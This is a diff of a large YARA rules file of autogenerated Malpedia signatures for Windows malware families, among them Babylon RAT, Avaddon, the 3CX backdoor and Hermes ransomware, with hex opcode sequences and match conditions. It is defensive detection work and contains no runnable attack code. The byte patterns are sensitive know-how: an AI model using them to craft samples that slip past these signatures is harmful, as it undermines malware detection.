-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zitmo_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.varenyky"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.varenyky_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "0686a29e962228ecc50738c63dd8a09a1caddb201f651468d74323cba829436b"
+		logic_hash = "c5bb03c58d8d0a3e4056574270047301338558839b61ccfc4ab3bac90d9c50ac"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134253,32 +134818,32 @@ rule MALPEDIA_Win_Zitmo_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 55 8bec 81c47cffffff ff4de4 46 c9 }
-		$sequence_1 = { e8???????? f7d3 4f e8???????? 8bca }
-		$sequence_2 = { 6a33 56 6831373600 6a35 68632403db e8???????? 40 }
-		$sequence_3 = { 23c7 f7d3 f7da 48 23ca }
-		$sequence_4 = { f7db 4e 03fa 23f0 03c3 2175f4 }
-		$sequence_5 = { 8bda 43 f7d3 8bf2 }
-		$sequence_6 = { 0945f8 ffb5dcfeffff e8???????? c9 c20800 }
-		$sequence_7 = { 8bcf 23c3 8d8dc8feffff 51 }
-		$sequence_8 = { c9 c20400 55 8bec 81c420ffffff ff8d6cffffff 8365dc34 }
-		$sequence_9 = { e8???????? c9 c20800 55 8bec 81c478ffffff ff4dc0 }
+		$sequence_0 = { 8b3d???????? 8b542418 6a00 52 8d8424c0130000 50 55 }
+		$sequence_1 = { e8???????? 83c40c 8d4c2414 51 8d54242c 52 }
+		$sequence_2 = { 8d442430 50 55 ffd7 85c0 0f8668010000 }
+		$sequence_3 = { 8b3d???????? ffd7 6803010000 8d8424a5020000 6a00 50 }
+		$sequence_4 = { 85c9 743d c60100 41 be???????? }
+		$sequence_5 = { 57 e8???????? 83c404 3c33 }
+		$sequence_6 = { e8???????? 83c404 6803010000 8d842445020000 6a00 50 }
+		$sequence_7 = { 6a00 6a06 8d442430 50 55 ffd7 85c0 }
+		$sequence_8 = { 897b04 c7430801000000 e8???????? 6a06 89430c 8d4310 8d897cfa4000 }
+		$sequence_9 = { 8db760fc4000 ff36 e8???????? 83c704 59 8906 83ff28 }
 
 	condition:
-		7 of them and filesize < 843776
+		7 of them and filesize < 24846336
 }
-rule MALPEDIA_Win_Babylon_Rat_Auto : FILE
+rule MALPEDIA_Win_Leouncia_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9f7a1796-9db6-5951-ad0f-bee6b4401843"
+		id = "32ec41a2-2da2-577f-8d90-05e26877f66a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.babylon_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.babylon_rat_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.leouncia"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.leouncia_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "21f4c795c3602b5a17bf075d20095868b597667dfa16017802f014398ad09283"
+		logic_hash = "f4b700de9db33424264876c9622563c2f372a2b66a216a2beabd8c8a0520c076"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134292,32 +134857,32 @@ rule MALPEDIA_Win_Babylon_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 894b34 8b4610 8b4dc8 8b44010c 894318 8b45fc 668b00 }
-		$sequence_1 = { ff7514 6a00 ff7510 ff750c 6a18 57 e8???????? }
-		$sequence_2 = { f6401620 7407 b806010000 5d c3 8b4848 53 }
-		$sequence_3 = { ffb510ffffff 52 56 e8???????? 83c40c 89852cffffff 85c0 }
-		$sequence_4 = { e8???????? 59 8945fc bf???????? 8b1f 50 53 }
-		$sequence_5 = { 8bc6 8b7510 eb03 8b4510 50 57 e8???????? }
-		$sequence_6 = { ff7518 ff75a8 ff75e4 ff75e0 ff75ac ff75f4 ffb57cffffff }
-		$sequence_7 = { ff7240 8b4004 ff75ec 8b00 894508 0fb74020 8945f4 }
-		$sequence_8 = { 8b45f8 0fb7f1 8b4df4 53 8364020100 c644020700 8b4124 }
-		$sequence_9 = { eb75 0fbf4320 3bc8 7514 8b45b8 6a00 03c1 }
+		$sequence_0 = { 8b442444 6a64 50 ff15???????? 3bc3 }
+		$sequence_1 = { c644046000 8d442460 50 e8???????? 8bf0 83c410 }
+		$sequence_2 = { 7714 8088????????10 8ac8 80c120 888820af4000 eb1f }
+		$sequence_3 = { 55 8bac2430040000 56 8b11 8d7010 8954240c }
+		$sequence_4 = { 55 ff15???????? 8bd8 89442430 2bde }
+		$sequence_5 = { ff15???????? 8be8 3beb 896c2424 7514 }
+		$sequence_6 = { c744240800540000 56 e8???????? 83c404 85c0 0f84f0000000 6a00 }
+		$sequence_7 = { 8d4c2454 8d542434 51 50 }
+		$sequence_8 = { 50 f3a4 e8???????? 8d7c2438 }
+		$sequence_9 = { e8???????? 8d542448 8bf0 52 e8???????? 83c424 81fec8000000 }
 
 	condition:
-		7 of them and filesize < 1604608
+		7 of them and filesize < 114688
 }
-rule MALPEDIA_Win_Afrodita_Auto : FILE
+rule MALPEDIA_Win_Avaddon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "abc25194-e40d-5d3d-8aa7-1b131b3ce317"
+		id = "a92a672c-0df0-579b-b5cc-abf6eb5f22bf"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.afrodita"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.afrodita_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avaddon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.avaddon_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "5cdb28e0e0c0d2fc18f90f498d1e0e06f36fb26b48f78ae36bd548bd118d94b5"
+		logic_hash = "9da4ad197260f3ad47fcf04fe9c86aafe2cfaae8d70042fb37f0ac71730ef837"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134331,32 +134896,32 @@ rule MALPEDIA_Win_Afrodita_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d8d6cffffff 895dec e8???????? 8b5de8 8bc7 83c80c c745fc03000000 }
-		$sequence_1 = { e8???????? 85c0 8d4dd0 0f94c3 e8???????? 8ac3 }
-		$sequence_2 = { 8bc6 83e0c0 8945f0 8d4110 8945e4 8bc2 2bc1 }
-		$sequence_3 = { c3 6a00 8bce e8???????? 8b7d0c }
-		$sequence_4 = { c745fc05000000 0d3c001800 8945ec 8d4584 50 }
-		$sequence_5 = { c745fc04000000 395d10 0f8600010000 6690 6a02 8d8d70ffffff e8???????? }
-		$sequence_6 = { 8bc3 eb08 8d040a 3bc3 0f42c3 3dffffff3f 0f87c8000000 }
-		$sequence_7 = { ff5018 8b7d08 0f1f00 83f8ff 7504 b301 eb56 }
-		$sequence_8 = { ff7514 890b 8d4e10 ff7510 897b04 8b01 53 }
-		$sequence_9 = { c645fc0d 33c0 56 8b11 8bca f3ab 85d2 }
+		$sequence_0 = { 6a00 56 ff15???????? 85c0 7527 ff15???????? 3d16000980 }
+		$sequence_1 = { f20f100d???????? 0fb6c0 f20f5cca 660f6ec0 f30fe6c0 0fb6c2 f20f59c8 }
+		$sequence_2 = { ff75d4 ffd6 c745fcffffffff 8b75ac 8945b4 85f6 }
+		$sequence_3 = { 8b5db8 037014 0375cc 8b4308 0faf45f0 03c2 }
+		$sequence_4 = { 83781408 8b7810 7202 8b08 ff75a8 8bd7 6a01 }
+		$sequence_5 = { 3dffffff7f 7743 03c0 56 50 e8???????? 8bf0 }
+		$sequence_6 = { 84c9 754e 8b4e14 03c7 3bc1 7239 8b06 }
+		$sequence_7 = { 0faf5708 8b4f14 0faf5704 0faf17 03d1 3bca 734c }
+		$sequence_8 = { 8b85fcfeffff 83c204 40 3b8570ffffff 8985fcfeffff 8b85d8feffff 0f8ce9feffff }
+		$sequence_9 = { ff10 8b45e4 83f808 7213 8d044502000000 50 ff75d0 }
 
 	condition:
-		7 of them and filesize < 2334720
+		7 of them and filesize < 2343936
 }
-rule MALPEDIA_Win_Bottomloader_Auto : FILE
+rule MALPEDIA_Win_Obscene_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b80f27db-a9fe-5886-83a1-b7800bdc0933"
+		id = "d248edfb-cd2d-59a2-b789-bf38244829c1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bottomloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bottomloader_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.obscene"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.obscene_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "e605cbf05da14cecd741717af69ae46ce70b645051ad1189e53cd9ddfd6b5a03"
+		logic_hash = "39a0d4041b2cc668b4ace8ad4daf4cef6d2ee34b044053350de4964082b18c2d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134370,32 +134935,32 @@ rule MALPEDIA_Win_Bottomloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 418bcd e8???????? 807c24700a 4c8d15fe0b0400 74bb 41b80d000000 448803 }
-		$sequence_1 = { 41c6460642 41c6460756 41c6460855 41c646096b 41c6460a77 41c6460b39 41c6460c49 }
-		$sequence_2 = { c705????????090400c0 c705????????01000000 c705????????01000000 b808000000 486bc000 488d0d3a7e0300 48c7040102000000 }
-		$sequence_3 = { e8???????? 488945e0 488955e8 488d5de0 48899dd0feffff 488d3d03120900 48897df8 }
-		$sequence_4 = { 488d8db0fcffff e8???????? 488d3d4f520900 4889bdf8fcffff 48c785f0fcffff0e000000 488d8df0fcffff e8???????? }
-		$sequence_5 = { 48bae0b1ffff0f270000 488d4df0 e8???????? 48bae0b1ffff0f270000 488d4df0 e8???????? 85c0 }
-		$sequence_6 = { 894d10 895518 44894520 4d89cd 488b5d30 488d35fae40400 488dbd10ffffff }
-		$sequence_7 = { 488b5208 4889d3 09c3 747b 48898570ffffff 48899578ffffff 488d3d19440a00 }
-		$sequence_8 = { e9???????? 48897da0 4c8d150ab70600 4c8955d8 48c745d00f000000 4c8d4dd0 440fbf06 }
-		$sequence_9 = { e8???????? 4c8d0dee830700 4c898d78fcffff 48c78570fcffff0e000000 488d8d70fcffff e8???????? 488d05c9830700 }
+		$sequence_0 = { 50 68ff000000 ff15???????? 8d8500ffffff 50 68???????? }
+		$sequence_1 = { 6aff ff15???????? 68???????? ff75f8 }
+		$sequence_2 = { 0fbe00 83f830 7c0b 8b45f8 }
+		$sequence_3 = { 6828431010 68e4401010 e8???????? 59 59 682c431010 }
+		$sequence_4 = { 6a06 68???????? ff35???????? 6aff ff15???????? 68???????? }
+		$sequence_5 = { eb61 68???????? 68???????? 68???????? e8???????? 83c40c 68???????? }
+		$sequence_6 = { ff15???????? 59 59 85c0 752f ff7508 68???????? }
+		$sequence_7 = { ff75ee ff15???????? 0fb7c0 83f819 }
+		$sequence_8 = { c605????????68 c705????????d15aaa00 c605????????c3 8d45fc 50 6a06 }
+		$sequence_9 = { 51 51 8d45f8 50 6a06 68???????? ff35???????? }
 
 	condition:
-		7 of them and filesize < 1955840
+		7 of them and filesize < 2170880
 }
-rule MALPEDIA_Win_Yarat_Auto : FILE
+rule MALPEDIA_Win_3Cx_Backdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "26d63431-4d21-54e8-9725-9df9b9ea5db9"
+		id = "a2feaa4e-af6b-5757-88c5-19fa5e0f7c9e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yarat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.yarat_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.3cx_backdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.3cx_backdoor_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "48d9368820ba368c523115d54deddffc1bdeeafa57938343dae7eabda399b87d"
+		logic_hash = "92678e8f023e2e18a272c55dabf9fa5b49a39a58d01ec45cd8edb3c746fea107"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134409,32 +134974,32 @@ rule MALPEDIA_Win_Yarat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8d4dc4 c645fc00 e8???????? 8b8f94000000 85c9 7444 }
-		$sequence_1 = { 898d60feffff 51 52 3bc8 7734 8bb574feffff 837dec10 }
-		$sequence_2 = { 8bc1 8b96d40f0000 0bc2 7448 33c0 8bdf 3bc2 }
-		$sequence_3 = { 8b4d10 8b4514 03f2 03da 2bfa 0f85d4feffff 5f }
-		$sequence_4 = { b787 71a6 bef82d06be 6a55 9aeede8c28ce52 91 b7d3 }
-		$sequence_5 = { b9???????? 894d08 c7471020000000 84d2 750c 38931e0b0000 0f8401030000 }
-		$sequence_6 = { e8???????? 8be5 5d c3 8db760010000 6a05 }
-		$sequence_7 = { 8b4514 83c408 83c9ff 5f 5e 8908 b001 }
-		$sequence_8 = { 8975fc eb28 33f6 b9???????? b041 0f1f00 3ac2 }
-		$sequence_9 = { 8d4510 c7451000000000 50 56 e8???????? 83c40c 397d10 }
+		$sequence_0 = { 49b8ffffffffffffff0f 4c8bf1 493bc0 0f849f010000 488b4910 }
+		$sequence_1 = { 418502 418b01 7409 440fabc0 418901 eba6 }
+		$sequence_2 = { 7575 488b7608 4c8b7608 4c3b7610 7443 33c0 }
+		$sequence_3 = { 488b8dc0010000 488bc1 4881fa00100000 0f82a30d0000 4883c227 488b49f8 }
+		$sequence_4 = { 482bc1 4883c0f8 4883f81f 0f8792090000 e8???????? 4c897580 48c745880f000000 }
+		$sequence_5 = { c60601 498b4660 48894608 0fb655c8 488d4dd0 e8???????? 488bc6 }
+		$sequence_6 = { 4180fa2d 7502 f7db 4584c9 7529 488b07 48ffc8 }
+		$sequence_7 = { 4883fa1f 7305 48ffc2 eb06 33d2 4983c104 }
+		$sequence_8 = { 89442448 ffc8 8bf8 410fb68c80023f0300 410fb6b480033f0300 488d1c8d00000000 8d040e }
+		$sequence_9 = { e8???????? 90 e8???????? 90 488bd3 488d8d80000000 e8???????? }
 
 	condition:
-		7 of them and filesize < 8692736
+		7 of them and filesize < 585728
 }
-rule MALPEDIA_Win_Cadelspy_Auto : FILE
+rule MALPEDIA_Win_Socks5_Systemz_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "860c18ff-53ed-5d9c-b2bc-98b95f4d188d"
+		id = "1b9e49c1-7943-57d2-ba80-481fd6bd4c4f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cadelspy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cadelspy_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.socks5_systemz"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.socks5_systemz_auto.yar#L1-L110"
 		license_url = "N/A"
-		logic_hash = "b3c44a014ad2fbee54fda667170619e7a6ae94d19236eba6a66ccc77fd775cd1"
+		logic_hash = "9753a87ae203dc0ffbfcfb14c7d357f4f852fcb6d79c68c3fdb61fe8b2c4fc73"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134448,71 +135013,69 @@ rule MALPEDIA_Win_Cadelspy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8d842460020000 8d4802 668b10 40 40 }
-		$sequence_1 = { 83e01f c1fa05 8b1495004c0110 59 c1e006 59 }
-		$sequence_2 = { 83e01f c1f905 8b0c8d004c0110 c1e006 03c1 f6400401 7524 }
-		$sequence_3 = { 2bc1 d1f8 6683bc44760400005c 7411 }
-		$sequence_4 = { a1???????? 33c5 89857c070000 53 8b9d88070000 56 57 }
-		$sequence_5 = { 57 ff742418 57 e8???????? 83c40c ff742414 }
-		$sequence_6 = { 6683bc447e0600005c 7411 68???????? 8d9c2484060000 e8???????? 8d44244c }
-		$sequence_7 = { 83ffff 741d 8b54240c 56 6a64 8d442444 59 }
-		$sequence_8 = { 57 6689842484060000 8d842486060000 56 50 e8???????? 83c40c }
-		$sequence_9 = { 59 56 57 ff15???????? 68???????? e8???????? 68???????? }
+		$sequence_0 = { 57 50 ff15???????? c744242cffffffff 85ed 741d 8d4504 }
+		$sequence_1 = { 896c2414 eb0d 50 ff15???????? 8be8 89442414 896c241c }
+		$sequence_2 = { e8???????? 8b5c241c 8bd0 83c408 8bca }
+		$sequence_3 = { 7408 83f9ff 7403 51 ffd3 8975a0 e9???????? }
+		$sequence_4 = { 8d4900 8b0e e8???????? 83c608 3bf7 75f2 }
+		$sequence_5 = { c744241c00000000 c6471801 e8???????? 8b7f4c 8b37 3bf7 7415 }
+		$sequence_6 = { 8d442404 50 e8???????? f744240400000080 7479 53 }
+		$sequence_7 = { e8???????? c706???????? 8d4e14 8b470c 89460c 8b4710 894610 }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 1417216
 }
-rule MALPEDIA_Win_Bernhardpos_Auto : FILE
+rule MALPEDIA_Win_Hermes_Ransom_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e53bca0c-e390-5052-8af3-50fac1bc5855"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bernhardpos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bernhardpos_auto.yar#L1-L119"
+		id = "88136c82-87ab-5f89-8963-9afb9534a540"
+		date = "2021-10-07"
+		modified = "2021-10-08"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes_ransom"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hermes_ransom_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "1e1ede6b562cb821e225ab092cfdf0abf71f1c6115a9127ed5d67b3e3afac78f"
+		logic_hash = "2bb9637b7e3ee9fcdd4e957eade001e8c8132e1b7c987ea6727ab44eda025915"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
+		malpedia_rule_date = "20211007"
+		malpedia_hash = "e5b790e0f888f252d49063a1251ca60ec2832535"
+		malpedia_version = "20211008"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c1e806 83e03f 8b4d0c 034df4 8a9020544100 }
-		$sequence_1 = { 6815b43ed8 a1???????? 50 e8???????? }
-		$sequence_2 = { 0fbe5415f8 33ca 8b4508 0345f4 8808 ebc7 5f }
-		$sequence_3 = { c745f800000000 c745f400000000 8b45f8 3b45fc 0f831d010000 8b45f8 }
-		$sequence_4 = { ba04000000 c1e200 8b8415d4fdffff 50 }
-		$sequence_5 = { 8bec 83ec48 53 56 57 c745fc00000000 c745f800000000 }
-		$sequence_6 = { 83e863 5f 5e 5b }
-		$sequence_7 = { 8d85d0feffff 8985c8feffff 8d85c4feffff 50 6aff 68ff000000 }
-		$sequence_8 = { e8???????? a3???????? 68a86b4aa0 a1???????? 50 e8???????? }
-		$sequence_9 = { e8???????? 83c404 6a01 8d85d0feffff 50 ff15???????? }
+		$sequence_0 = { 59 59 8945e0 837ddc00 7506 837de000 7405 }
+		$sequence_1 = { 8d45dc 50 ff75d8 8d8560ffffff 50 ff75e0 ff15???????? }
+		$sequence_2 = { 33c0 668945e2 33c0 8945e4 8945e8 837df020 }
+		$sequence_3 = { 6a00 8d85a4f9ffff 50 ff15???????? 5f 5e 8be5 }
+		$sequence_4 = { 0fb7844504f7ffff 83f83b 741f 8b45d8 8b4df0 668b8c4d04f7ffff }
+		$sequence_5 = { 8365c800 8365d000 c745b840420f00 8365e000 eb07 8b45e0 40 }
+		$sequence_6 = { 59 6bc900 668981e8c34000 6a02 }
+		$sequence_7 = { 59 59 6a0f 6a00 8d45bc 50 }
+		$sequence_8 = { 8365f000 8b45f0 8945f8 837df800 7456 }
+		$sequence_9 = { 83e002 7415 ff750c ff75fc e8???????? 59 }
 
 	condition:
-		7 of them and filesize < 368640
+		7 of them and filesize < 7192576
 }
-rule MALPEDIA_Win_Roopy_Auto : FILE
+rule MALPEDIA_Win_Fonix_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9d1cd38d-a1c4-5021-82c4-ab42553b0148"
+		id = "13e11a44-10a3-5017-894b-01b6a1809d38"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.roopy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.roopy_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fonix"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fonix_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "635b23691aea648c5b01623163933331eba5c241a10085695aa02ee95522aae1"
+		logic_hash = "4ee726385c93cbef83aaf363fadcc91c1116e9967604b802fb868026ddede36e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134526,32 +135089,32 @@ rule MALPEDIA_Win_Roopy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c7404800000000 c7404c00000000 eb15 8b55f8 8b8590fdffff 894248 8b8594fdffff }
-		$sequence_1 = { f3a4 0fb7859cfcffff 68ff000000 8d8d70fbffff baffffffff }
-		$sequence_2 = { 7fbe 8d85ccefffff 50 6801100000 8d85d0efffff 50 ff75e4 }
-		$sequence_3 = { 8d55f8 8b45f0 ff15???????? 8d55fc 89d8 }
-		$sequence_4 = { e8???????? 39d6 7c06 7f0a 39c3 7706 c6042401 }
-		$sequence_5 = { 89c2 83ea01 8b45f8 8b4004 e8???????? }
-		$sequence_6 = { 89c7 89fa b8???????? e8???????? 8b5654 895024 89f8 }
-		$sequence_7 = { 89de 89f0 e8???????? 89c7 89d3 8b45fc }
-		$sequence_8 = { 8b45a4 8d5058 8b4da4 8b412c b91c000000 e8???????? 83459001 }
-		$sequence_9 = { 8d858cfcffff 30c9 6631d2 e8???????? 0fb785a4fcffff 68ff000000 8d8d70fbffff }
+		$sequence_0 = { e8???????? e8???????? c3 83c1fc 8b01 ff504c 83c008 }
+		$sequence_1 = { 75f2 8b7518 8b4d20 8bc6 2bce 83e1c0 81f900100000 }
+		$sequence_2 = { 8d8d10ffffff e9???????? 8d8d98fbffff e9???????? 8d4da4 e9???????? }
+		$sequence_3 = { 8bc6 5e 5d c20400 8b4948 6a01 }
+		$sequence_4 = { c5fdef85e0fdffff c5fe7f85e0f9ffff c5fe6f85e0f9ffff c5fe7f4580 c5fe6f8560ffffff c5fdef85c0fdffff c5fe7f85c0f9ffff }
+		$sequence_5 = { 8d420c 8b4ae8 33c8 e8???????? b8???????? e9???????? 6a40 }
+		$sequence_6 = { 50 e8???????? cc 803d????????00 7505 e8???????? }
+		$sequence_7 = { c5fe7f8540edffff c5fe6f8540edffff c5fe7f85c0feffff c5fd708520ffffff93 c5fe7f8520edffff c5fe6f8520edffff c5fe7f8520ffffff }
+		$sequence_8 = { 8b4004 8bce ffd0 0fb64d07 bb01000000 84c0 }
+		$sequence_9 = { 50 e8???????? 83c408 50 68???????? 8d4d5c e8???????? }
 
 	condition:
-		7 of them and filesize < 739328
+		7 of them and filesize < 2226176
 }
-rule MALPEDIA_Win_Amtsol_Auto : FILE
+rule MALPEDIA_Win_Lockfile_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d1d86fa3-9623-55ab-a209-71141f53945c"
+		id = "06969e31-f5a2-5625-9b28-348da0894916"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.amtsol"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.amtsol_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockfile"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lockfile_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "0a770dc5a932b1002072b79c5d73e29f3137e050ecc56387df95b6b6024c1535"
+		logic_hash = "ccc239fdec0009df6e27636b6ceb3da4ca587bf03dbd6e51ebddd7a3a56ef524"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134565,32 +135128,32 @@ rule MALPEDIA_Win_Amtsol_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d85e8fbffff 50 e8???????? 83c40c 6a10 5f 3bc7 }
-		$sequence_1 = { 8dbe54030000 8bcf e8???????? 8d8e8c030000 }
-		$sequence_2 = { ff75f0 e8???????? 59 395df4 7409 ff75f4 e8???????? }
-		$sequence_3 = { 83c40c 8946e8 85c0 752b 015d0c 47 3b7df8 }
-		$sequence_4 = { 8bd8 035df0 8b45f0 33c3 2345f8 6a14 3345f0 }
-		$sequence_5 = { 8b757c 8b8580000000 8945dc 33db 895de4 895dd8 33ff }
-		$sequence_6 = { 57 e8???????? 59 59 85c0 740d 8bf8 }
-		$sequence_7 = { 837d0800 53 56 8bf1 0f84aa000000 8b5d0c 85db }
-		$sequence_8 = { 50 8d459c 50 68???????? e8???????? 83c414 3bc3 }
-		$sequence_9 = { 85c0 7428 837dfc00 7413 0fb745f8 50 ff75fc }
+		$sequence_0 = { 488bc3 eb02 33c0 488b5c2440 488b6c2448 488b742450 488b7c2458 }
+		$sequence_1 = { c6856401000069 c685650100003f c685660100003d c6856701000020 c685680100003f c6856901000029 c6856a0100003e }
+		$sequence_2 = { 740b 488b01 ba01000000 ff10 90 4c897dd8 488b4dc8 }
+		$sequence_3 = { 4883ec20 488bd9 ba60000000 b958000000 488b4360 48394358 0f42d1 }
+		$sequence_4 = { 498b4210 4c3bc1 4983d700 48f76328 4f8d343c 488bf2 498d0c00 }
+		$sequence_5 = { 498d0c01 498b4528 493bc9 4983d400 49f76328 4f8d3427 488bf2 }
+		$sequence_6 = { 4883fa10 7203 488b07 488d1c08 41b817000000 488d15605f0600 488bcb }
+		$sequence_7 = { 4883d200 4c03e2 4889559f 48f76648 498d0c00 498b4348 493bc8 }
+		$sequence_8 = { 8b4510 0416 346d 88452a 8b4510 0417 3465 }
+		$sequence_9 = { 4833c4 48898590010000 4c8bad08020000 0f57c0 0f1185b0000000 0f1185c0000000 0f1185d0000000 }
 
 	condition:
-		7 of them and filesize < 335872
+		7 of them and filesize < 1163264
 }
-rule MALPEDIA_Win_Defray_Auto : FILE
+rule MALPEDIA_Win_Backspace_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "23c37ae2-467d-5f29-b754-9bdc94cdef46"
+		id = "74f06e56-cb1b-558b-a9a6-675b90898d32"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.defray"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.defray_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.backspace"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.backspace_auto.yar#L1-L125"
